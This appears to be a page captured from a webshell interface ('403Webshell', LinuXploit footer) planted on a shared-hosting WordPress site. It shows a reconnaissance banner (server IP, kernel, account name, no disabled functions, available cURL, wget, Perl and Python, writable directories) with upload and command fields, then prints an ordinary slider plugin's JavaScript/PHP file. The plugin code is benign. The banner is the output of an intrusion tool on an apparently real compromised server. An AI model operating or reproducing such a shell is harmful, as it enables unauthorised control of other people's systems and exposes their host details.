403Webshell
Server IP : 68.178.247.200  /  Your IP : 216.73.216.14
Web Server : Apache
System : Linux p3plzcpnl489463.prod.phx3.secureserver.net 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
User : x9dppmxs4rgd ( 8559391)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/x9dppmxs4rgd/www/wp-content/plugins/slider-video/Scripts/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/x9dppmxs4rgd/www/wp-content/plugins/slider-video/Scripts/RW_VS_Slider_Thumbnails.js.php
<script>
					function Rich_Web_VSlider_TS_Open_Video<?= $Rich_Web_VSlider_ID; ?>(Rich_Web_VSldier_Src)
					{

						jQuery('#gallery-con<?= $Rich_Web_VSlider_ID; ?> .Rich_Web_TS_Play_Video_Div<?= $Rich_Web_VSlider_ID; ?>').css('display','block');
						jQuery('#gallery-con<?= $Rich_Web_VSlider_ID; ?> .Rich_Web_TS_Play_Video_Div<?= $Rich_Web_VSlider_ID; ?> .Rich_Web_VSlider_TS_Src_Iframe<?= $Rich_Web_VSlider_ID; ?>').attr('src',Rich_Web_VSldier_Src+'?autoplay=1&rel=0&amp');
						jQuery('.Rich_Web_VSlider_TS_PlayIcon<?= $Rich_Web_VSlider_ID; ?>').css('display','none');
					}
					function Rich_Web_VSlider_TS_Play_Video<?= $Rich_Web_VSlider_ID; ?>()
					{
						var Rich_Web_VSldier_Src;
						jQuery('#thumbcon<?= $Rich_Web_VSlider_ID; ?> img').each(function(){
							if(jQuery(this).hasClass('selected')) { Rich_Web_VSldier_Src=jQuery(this).attr('alt'); }
						})
						Rich_Web_VSlider_TS_Open_Video<?= $Rich_Web_VSlider_ID; ?>(Rich_Web_VSldier_Src)
					}
					function Rich_Web_VSlider_TS_Close_Video<?= $Rich_Web_VSlider_ID; ?>()
					{
						jQuery('#gallery-con<?= $Rich_Web_VSlider_ID; ?> .Rich_Web_TS_Play_Video_Div<?= $Rich_Web_VSlider_ID; ?>').css('display','none');
						jQuery('#gallery-con<?= $Rich_Web_VSlider_ID; ?> .Rich_Web_TS_Play_Video_Div<?= $Rich_Web_VSlider_ID; ?> .Rich_Web_VSlider_TS_Src_Iframe<?= $Rich_Web_VSlider_ID; ?>').attr('src', '');
						jQuery('.Rich_Web_VSlider_TS_PlayIcon<?= $Rich_Web_VSlider_ID; ?>').css('display','block');
					}
				</script>
				<script >
					var $transitionLength<?= $Rich_Web_VSlider_ID; ?> = <?= $Rich_Web_VSlider_Eff[0]->Rich_Web_VS_TS_CS;?>;
					var $timeBetweenTransitions = <?= $Rich_Web_VSlider_Eff[0]->Rich_Web_VS_TS_PT*1000;?>;
					//STORAGE
					var imageCount<?= $Rich_Web_VSlider_ID; ?> = 0;
					var currentImageIndex<?= $Rich_Web_VSlider_ID; ?> = 0;
					var currentScrollIndex<?= $Rich_Web_VSlider_ID; ?> = 1;
					var $imageBank<?= $Rich_Web_VSlider_ID; ?> = [];
					var $thumbBank<?= $Rich_Web_VSlider_ID; ?> = [];
					var $mainContainer<?= $Rich_Web_VSlider_ID; ?> = jQuery("#gallery-main<?= $Rich_Web_VSlider_ID; ?>");
					var $thumbContainer<?= $Rich_Web_VSlider_ID; ?> = jQuery("#thumbcon<?= $Rich_Web_VSlider_ID; ?>");
					var $progressBar<?= $Rich_Web_VSlider_ID; ?> = jQuery("#progressbar<?= $Rich_Web_VSlider_ID; ?>");
					var currentElement;
					//CONTROLS
					<?php if($Rich_Web_VSlider_Eff[0]->Rich_Web_VS_TS_AP=='on'){ ?>
						var $go<?= $Rich_Web_VSlider_ID; ?> = true;
					<?php }else{ ?>
						var $go<?= $Rich_Web_VSlider_ID; ?> = false;
					<?php }?>
					// jQuery(document).ready(function(){
						jQuery("#gallery-hidden<?= $Rich_Web_VSlider_ID; ?> img").each(function() { $imageBank<?= $Rich_Web_VSlider_ID; ?>.push(jQuery(this).attr("id", imageCount<?= $Rich_Web_VSlider_ID; ?>)); imageCount<?= $Rich_Web_VSlider_ID; ?>++; });
						generateThumbs<?= $Rich_Web_VSlider_ID; ?>();
						setTimeout(function () { imageScroll<?= $Rich_Web_VSlider_ID; ?>(0); }, $timeBetweenTransitions);
						jQuery('#left-arrow<?= $Rich_Web_VSlider_ID; ?>').click(function (e) {
							thumbScroll<?= $Rich_Web_VSlider_ID; ?>("left"); 
							toggleScroll<?= $Rich_Web_VSlider_ID; ?>(true); 
						});
						jQuery('#right-arrow<?= $Rich_Web_VSlider_ID; ?>').click(function () { 
							thumbScroll<?= $Rich_Web_VSlider_ID; ?>("right"); 
							toggleScroll<?= $Rich_Web_VSlider_ID; ?>(true); 
						});
						jQuery('#thumbcon<?= $Rich_Web_VSlider_ID; ?> img').on('click',function () { imageFocus<?= $Rich_Web_VSlider_ID; ?>(this); });
						jQuery('#playtoggle<?= $Rich_Web_VSlider_ID; ?>').click(function () { toggleScroll<?= $Rich_Web_VSlider_ID; ?>(false); });
					// });
					function progress<?= $Rich_Web_VSlider_ID; ?>(imageIndex)
					{
						var partsphp = <?= $Rich_Web_VSlider_Eff[0]->Rich_Web_VS_TS_W;?>;
						var parts = partsphp/imageCount<?= $Rich_Web_VSlider_ID; ?>-1;
						var pxProgress = parts*(imageIndex+1);
						$progressBar<?= $Rich_Web_VSlider_ID; ?>.css({ width: pxProgress , transition: "all 0.7s ease"});
					}
					function imageFocus<?= $Rich_Web_VSlider_ID; ?>(focus)
					{
						for(var i = 0; i < imageCount<?= $Rich_Web_VSlider_ID; ?>; i++)
						{
							if($imageBank<?= $Rich_Web_VSlider_ID; ?>[i].attr('data-rwimg') == jQuery(focus).attr('data-rwimg'))
							{
								$mainContainer<?= $Rich_Web_VSlider_ID; ?>.fadeOut($transitionLength<?= $Rich_Web_VSlider_ID; ?>);
								$thumbBank<?= $Rich_Web_VSlider_ID; ?>[currentImageIndex<?= $Rich_Web_VSlider_ID; ?>].removeClass("selected");
								setTimeout(function () {
									$mainContainer<?= $Rich_Web_VSlider_ID; ?>.html($imageBank<?= $Rich_Web_VSlider_ID; ?>[i]);
									$thumbBank<?= $Rich_Web_VSlider_ID; ?>[i].addClass("selected");
									$mainContainer<?= $Rich_Web_VSlider_ID; ?>.fadeIn($transitionLength<?= $Rich_Web_VSlider_ID; ?>);
								}, $transitionLength<?= $Rich_Web_VSlider_ID; ?>);
								currentScrollIndex<?= $Rich_Web_VSlider_ID; ?> = i+1;
								currentImageIndex<?= $Rich_Web_VSlider_ID; ?> = i;
								progress<?= $Rich_Web_VSlider_ID; ?>(currentImageIndex<?= $Rich_Web_VSlider_ID; ?>);
								toggleScroll<?= $Rich_Web_VSlider_ID; ?>(true);
								return false;
							}
						}
					}
					function toggleScroll<?= $Rich_Web_VSlider_ID; ?>(bool)
					{
						if($go<?= $Rich_Web_VSlider_ID; ?>)
						{
							$go<?= $Rich_Web_VSlider_ID; ?> = false;
							jQuery('#playtoggle<?= $Rich_Web_VSlider_ID; ?>').children().removeClass('icon-pause').addClass('icon-play');
						}
						else
						{
							$go<?= $Rich_Web_VSlider_ID; ?> = true;
							jQuery('#playtoggle<?= $Rich_Web_VSlider_ID; ?>').children().removeClass('icon-play').addClass('icon-pause');
						}
						if(bool)
						{
							$go<?= $Rich_Web_VSlider_ID; ?> = false;
							jQuery('#playtoggle<?= $Rich_Web_VSlider_ID; ?>').children().removeClass('icon-pause').addClass('icon-play');
						}
					}
					var y=false;
					function autoScroll<?= $Rich_Web_VSlider_ID; ?>()
					{
						if(y==true){ return; }
						var imgW=jQuery('#gallery-con<?= $Rich_Web_VSlider_ID; ?> #thumbnails<?= $Rich_Web_VSlider_ID; ?> #thumbcon<?= $Rich_Web_VSlider_ID; ?> .thumb').outerWidth();
						var mLeft=jQuery('.marginLeft').val();
						AutImgW=parseInt(imgW)+2*parseInt(mLeft);
						var tumCWidth=jQuery('#gallery-con<?= $Rich_Web_VSlider_ID; ?> #thumbnails<?= $Rich_Web_VSlider_ID; ?> #thumbcon<?= $Rich_Web_VSlider_ID; ?>').width();
						if(currentScrollIndex<?= $Rich_Web_VSlider_ID; ?> >= 0 || currentScrollIndex<?= $Rich_Web_VSlider_ID; ?> < imageCount<?= $Rich_Web_VSlider_ID; ?>)
						{
							if(parseInt($thumbBank<?= $Rich_Web_VSlider_ID; ?>[0].css('margin-left'))<=-parseInt((imageCount<?= $Rich_Web_VSlider_ID; ?>)*AutImgW-parseInt(tumCWidth)))
							{
								$thumbBank<?= $Rich_Web_VSlider_ID; ?>[0].css({ marginLeft: "5px" , webkitMarginLeft: "5px" , mozMarginLeft: "5px" , transition: "all 1.0s ease", webkitTransition: "all 1.0s ease", MozTransition: "all 1.0s ease", msTransition: "all 1.0s ease", OTransition: "all 1.0s ease"});
								currentScrollIndex<?= $Rich_Web_VSlider_ID; ?> = 1;
							}
							else
							{

								$thumbBank<?= $Rich_Web_VSlider_ID; ?>[0].css({ marginLeft: "-="+AutImgW+"" , webkitMarginLeft: "-="+AutImgW+"" , mozMarginLeft: "-="+AutImgW+"" , transition: "all 1.0s ease", webkitTransition: "all 1.0s ease", MozTransition: "all 1.0s ease", msTransition: "all 1.0s ease", OTransition: "all 1.0s ease"});
								currentScrollIndex<?= $Rich_Web_VSlider_ID; ?>++;
							}
						}
					}
					function thumbScroll<?= $Rich_Web_VSlider_ID; ?>(direction)
					{
						if(y==true){ return; }
						y=true;
						var imgW=jQuery('#gallery-con<?= $Rich_Web_VSlider_ID; ?> #thumbnails<?= $Rich_Web_VSlider_ID; ?> #thumbcon<?= $Rich_Web_VSlider_ID; ?> .thumb').outerWidth();
						var mLeft=jQuery('.marginLeft').val();
						AutImgW=parseInt(imgW)+2*parseInt(mLeft);
						var tumCWidth=jQuery('#gallery-con<?= $Rich_Web_VSlider_ID; ?> #thumbnails<?= $Rich_Web_VSlider_ID; ?> #thumbcon<?= $Rich_Web_VSlider_ID; ?>').width();
						if(currentScrollIndex<?= $Rich_Web_VSlider_ID; ?> >= 0 || currentScrollIndex<?= $Rich_Web_VSlider_ID; ?> < imageCount<?= $Rich_Web_VSlider_ID; ?>)
						{
							var marginTemp = currentScrollIndex<?= $Rich_Web_VSlider_ID; ?>;
							var k=0;
							if(direction == "left")
							{
								if(currentScrollIndex<?= $Rich_Web_VSlider_ID; ?>-1 <= 0)
								{
									
									k = ((imageCount<?= $Rich_Web_VSlider_ID; ?>)*AutImgW-parseInt(tumCWidth));
									$thumbBank<?= $Rich_Web_VSlider_ID; ?>[0].css({ marginLeft: -k , transition: "all 1.0s ease", webkitTransition: "all 1.0s ease", MozTransition: "all 1.0s ease", msTransition: "all 1.0s ease", OTransition: "all 1.0s ease"});
									currentScrollIndex<?= $Rich_Web_VSlider_ID; ?> = imageCount<?= $Rich_Web_VSlider_ID; ?>-1;
								}
								else
								{
									
									$thumbBank<?= $Rich_Web_VSlider_ID; ?>[0].css({ marginLeft: "+="+AutImgW+"" , transition: "all 1.0s ease", webkitTransition: "all 1.0s ease", MozTransition: "all 1.0s ease", msTransition: "all 1.0s ease", OTransition: "all 1.0s ease"});
									currentScrollIndex<?= $Rich_Web_VSlider_ID; ?>--;
								}
							}
							else if(direction == "right")
							{
								
								if(parseInt($thumbBank<?= $Rich_Web_VSlider_ID; ?>[0].css('margin-left'))<=-parseInt((imageCount<?= $Rich_Web_VSlider_ID; ?>)*AutImgW-parseInt(tumCWidth)))
								{
									
									$thumbBank<?= $Rich_Web_VSlider_ID; ?>[0].css({ marginLeft: "5px" , transition: "all 1.0s ease", webkitTransition: "all 1.0s ease", MozTransition: "all 1.0s ease", msTransition: "all 1.0s ease", OTransition: "all 1.0s ease"});
									currentScrollIndex<?= $Rich_Web_VSlider_ID; ?> = 1;
								}
								else
								{
									$thumbBank<?= $Rich_Web_VSlider_ID; ?>[0].css({ marginLeft: "-="+AutImgW+"" , transition: "all 1.0s ease", webkitTransition: "all 1.0s ease", MozTransition: "all 1.0s ease", msTransition: "all 1.0s ease", OTransition: "all 1.0s ease"});
									currentScrollIndex<?= $Rich_Web_VSlider_ID; ?>++;
								}
							}
						}
						setTimeout(function(){ y=false; },1000)
					}
					function generateThumbs<?= $Rich_Web_VSlider_ID; ?>()
					{
						progress<?= $Rich_Web_VSlider_ID; ?>(currentImageIndex<?= $Rich_Web_VSlider_ID; ?>);
						for(var i = 0; i < imageCount<?= $Rich_Web_VSlider_ID; ?>; i++)
						{
							var $tempObj<?= $Rich_Web_VSlider_ID; ?> = jQuery('<img id="'+i+'t" class="thumb thumb<?= $Rich_Web_VSlider_ID; ?>" data-rwimg="'+$imageBank<?= $Rich_Web_VSlider_ID; ?>[i].attr('data-rwimg')+'" src="'+$imageBank<?= $Rich_Web_VSlider_ID; ?>[i].attr('data-rwimg')+'" alt="'+$imageBank<?= $Rich_Web_VSlider_ID; ?>[i].attr('onclick').split("('")[1].split("')")[0]+'" onclick="Rich_Web_VSlider_TS_Close_Video<?= $Rich_Web_VSlider_ID; ?>()"/>');
							if(i == 0)
								$tempObj<?= $Rich_Web_VSlider_ID; ?>.addClass("selected");
							$thumbContainer<?= $Rich_Web_VSlider_ID; ?>.append($tempObj<?= $Rich_Web_VSlider_ID; ?>);
							$thumbBank<?= $Rich_Web_VSlider_ID; ?>.push($tempObj<?= $Rich_Web_VSlider_ID; ?>);
						}
					}
					function imageScroll<?= $Rich_Web_VSlider_ID; ?>(c)
					{
						if($go<?= $Rich_Web_VSlider_ID; ?>)
						{
							$thumbBank<?= $Rich_Web_VSlider_ID; ?>[c].removeClass("selected");
							c++
							if(c == $imageBank<?= $Rich_Web_VSlider_ID; ?>.length)
								c = 0;
							$mainContainer<?= $Rich_Web_VSlider_ID; ?>.fadeOut($transitionLength<?= $Rich_Web_VSlider_ID; ?>);
							setTimeout(function () {
								$mainContainer<?= $Rich_Web_VSlider_ID; ?>.html($imageBank<?= $Rich_Web_VSlider_ID; ?>[c]);
								$thumbBank<?= $Rich_Web_VSlider_ID; ?>[c].addClass("selected");
								autoScroll<?= $Rich_Web_VSlider_ID; ?>("left");
								$mainContainer<?= $Rich_Web_VSlider_ID; ?>.fadeIn($transitionLength<?= $Rich_Web_VSlider_ID; ?>);
							}, $transitionLength<?= $Rich_Web_VSlider_ID; ?>);
						}
						progress<?= $Rich_Web_VSlider_ID; ?>(c);
						setTimeout(function () {
							imageScroll<?= $Rich_Web_VSlider_ID; ?>(currentImageIndex<?= $Rich_Web_VSlider_ID; ?>);
						}, $timeBetweenTransitions);
						currentImageIndex<?= $Rich_Web_VSlider_ID; ?> = c;
					}
				</script>
				<script>
					var SlWidth3 = parseInt(jQuery('.SlWidth3<?= $Rich_Web_VSlider_ID; ?>').val());
					var SlHeight3 = parseInt(jQuery('.SlHeight3<?= $Rich_Web_VSlider_ID; ?>').val());
					var carDivWidth = parseInt(jQuery('.carDivWidth<?= $Rich_Web_VSlider_ID; ?>').val());
					var carDivImgHeight = parseInt(jQuery('.carDivImgHeight<?= $Rich_Web_VSlider_ID; ?>').val());

					var BW = jQuery('.BW<?= $Rich_Web_VSlider_ID; ?>').val();
					var carTopLeft = jQuery('.carTopLeft<?= $Rich_Web_VSlider_ID; ?>').val();
					function resp<?= $Rich_Web_VSlider_ID; ?>(){
						jQuery("#RW_Load_Thumb_Navigation<?= $Rich_Web_VSlider_ID; ?>").css("max-height",Math.floor((SlHeight3+carDivImgHeight)/SlWidth3*jQuery("#RW_Load_Thumb_Navigation<?= $Rich_Web_VSlider_ID; ?>").width()));
						jQuery('#gallery-main<?= $Rich_Web_VSlider_ID; ?>,#gallery-main<?= $Rich_Web_VSlider_ID; ?>_Anim').css('height',Math.floor(SlHeight3/SlWidth3*jQuery('#gallery-con<?= $Rich_Web_VSlider_ID; ?>').width()));
						jQuery('#gallery-con<?= $Rich_Web_VSlider_ID; ?> .Rich_Web_TS_Play_Video_Div<?= $Rich_Web_VSlider_ID; ?>').css('height',Math.floor(SlHeight3/SlWidth3*jQuery('#gallery-con<?= $Rich_Web_VSlider_ID; ?>').width()));
						jQuery('#gallery-con<?= $Rich_Web_VSlider_ID; ?> #thumbnails<?= $Rich_Web_VSlider_ID; ?> #thumbcon<?= $Rich_Web_VSlider_ID; ?> .thumb').css('height',Math.floor(carDivImgHeight*jQuery('#gallery-con<?= $Rich_Web_VSlider_ID; ?>').width()/(jQuery('#gallery-con<?= $Rich_Web_VSlider_ID; ?>').width()+250)));
						jQuery('#gallery-con<?= $Rich_Web_VSlider_ID; ?> #thumbnails<?= $Rich_Web_VSlider_ID; ?>').css('height',Math.floor(carDivImgHeight*jQuery('#gallery-con<?= $Rich_Web_VSlider_ID; ?>').width()/(jQuery('#gallery-con<?= $Rich_Web_VSlider_ID; ?>').width()+250)+24));
						jQuery('.Rich_Web_VSlider_TS_PlayIcon<?= $Rich_Web_VSlider_ID; ?> span').css('width',Math.floor(86*jQuery('#gallery-con<?= $Rich_Web_VSlider_ID; ?>').width()/1000));
						jQuery('.Rich_Web_VSlider_TS_PlayIcon<?= $Rich_Web_VSlider_ID; ?> span').css('height',Math.floor(61*jQuery('#gallery-con<?= $Rich_Web_VSlider_ID; ?>').width()/1000));
						jQuery('.Rich_Web_VSlider_TS_PlayIcon<?= $Rich_Web_VSlider_ID; ?> span').css('font-size',Math.floor(32*jQuery('#gallery-con<?= $Rich_Web_VSlider_ID; ?>').width()/1000));
						jQuery('.Rich_Web_VSlider_TS_PlayIcon<?= $Rich_Web_VSlider_ID; ?> span').css('line-height',Math.floor(64*jQuery('#gallery-con<?= $Rich_Web_VSlider_ID; ?>').width()/1000)+'px');
						jQuery('.Rich_Web_VSlider_TS_PlayIcon<?= $Rich_Web_VSlider_ID; ?>').css('height',Math.floor(50*jQuery('#gallery-con<?= $Rich_Web_VSlider_ID; ?>').width()/1000));
						jQuery('#gallery-con<?= $Rich_Web_VSlider_ID; ?> #thumbnails<?= $Rich_Web_VSlider_ID; ?> .ui-button').css('width',Math.floor(32*jQuery('#gallery-con<?= $Rich_Web_VSlider_ID; ?>').width()/(jQuery('#gallery-con<?= $Rich_Web_VSlider_ID; ?>').width()+250)));
						jQuery('#gallery-con<?= $Rich_Web_VSlider_ID; ?> #thumbnails<?= $Rich_Web_VSlider_ID; ?> .ui-button').css('height',Math.floor(32*jQuery('#gallery-con<?= $Rich_Web_VSlider_ID; ?>').width()/(jQuery('#gallery-con<?= $Rich_Web_VSlider_ID; ?>').width()+250)));
						if(carTopLeft=='bottom')
						{
							jQuery('#gallery-con<?= $Rich_Web_VSlider_ID; ?> #thumbnails<?= $Rich_Web_VSlider_ID; ?> #playtoggle<?= $Rich_Web_VSlider_ID; ?>').css('top',-Math.floor(40*jQuery('#gallery-con<?= $Rich_Web_VSlider_ID; ?>').width()/(jQuery('#gallery-con<?= $Rich_Web_VSlider_ID; ?>').width()+250)));
						}
						else
						{
							jQuery('#gallery-con<?= $Rich_Web_VSlider_ID; ?> #thumbnails<?= $Rich_Web_VSlider_ID; ?> #playtoggle<?= $Rich_Web_VSlider_ID; ?>').css('top',Math.floor(carDivImgHeight*jQuery('#gallery-con<?= $Rich_Web_VSlider_ID; ?>').width()/(jQuery('#gallery-con<?= $Rich_Web_VSlider_ID; ?>').width()+250)+26));
						}
						jQuery('#gallery-con<?= $Rich_Web_VSlider_ID; ?> #thumbnails<?= $Rich_Web_VSlider_ID; ?> #playtoggle<?= $Rich_Web_VSlider_ID; ?>').css('right',Math.floor(10*jQuery('#gallery-con<?= $Rich_Web_VSlider_ID; ?>').width()/(jQuery('#gallery-con<?= $Rich_Web_VSlider_ID; ?>').width()+250)));
						jQuery('#gallery-con<?= $Rich_Web_VSlider_ID; ?> #thumbnails<?= $Rich_Web_VSlider_ID; ?> #thumbcon<?= $Rich_Web_VSlider_ID; ?>').css('width',Math.floor(jQuery('#gallery-con<?= $Rich_Web_VSlider_ID; ?>').width()-15-64*jQuery('#gallery-con<?= $Rich_Web_VSlider_ID; ?>').width()/(jQuery('#gallery-con<?= $Rich_Web_VSlider_ID; ?>').width()+250)));
					}
					resp<?= $Rich_Web_VSlider_ID; ?>();
					setTimeout(function(){ resp<?= $Rich_Web_VSlider_ID; ?>(); },200);
					var array_thumb<?= $Rich_Web_VSlider_ID; ?>=[];
					jQuery(".gallery_thumb_img<?= $Rich_Web_VSlider_ID; ?>").each(function(){
						if( jQuery(this).attr("data-rwimg") != "" ) {
							array_thumb<?= $Rich_Web_VSlider_ID; ?>.push(jQuery(this).attr("data-rwimg"));
						}
					})
					var y_thumb<?= $Rich_Web_VSlider_ID; ?>=0;
					console.log(array_thumb<?= $Rich_Web_VSlider_ID; ?>)
					for(i=0;i<array_thumb<?= $Rich_Web_VSlider_ID; ?>.length;i++){
						jQuery(".gallery_rw_<?php echo $Rich_Web_VSlider_ID; ?>-"+i).attr('src', array_thumb<?= $Rich_Web_VSlider_ID; ?>[i]).on("load",function(){
							y_thumb<?= $Rich_Web_VSlider_ID; ?>++;
							if(y_thumb<?= $Rich_Web_VSlider_ID; ?> == array_thumb<?= $Rich_Web_VSlider_ID; ?>.length){
								jQuery("#gallery-con<?= $Rich_Web_VSlider_ID; ?>").fadeIn(1000);
								jQuery("#RW_Load_Thumb_Navigation<?= $Rich_Web_VSlider_ID; ?>").remove();
							}
						})
					}
					jQuery(window).resize(function(){ resp<?= $Rich_Web_VSlider_ID; ?>(); });
				</script>

Youez - 2016 - github.com/yon3zu
LinuXploit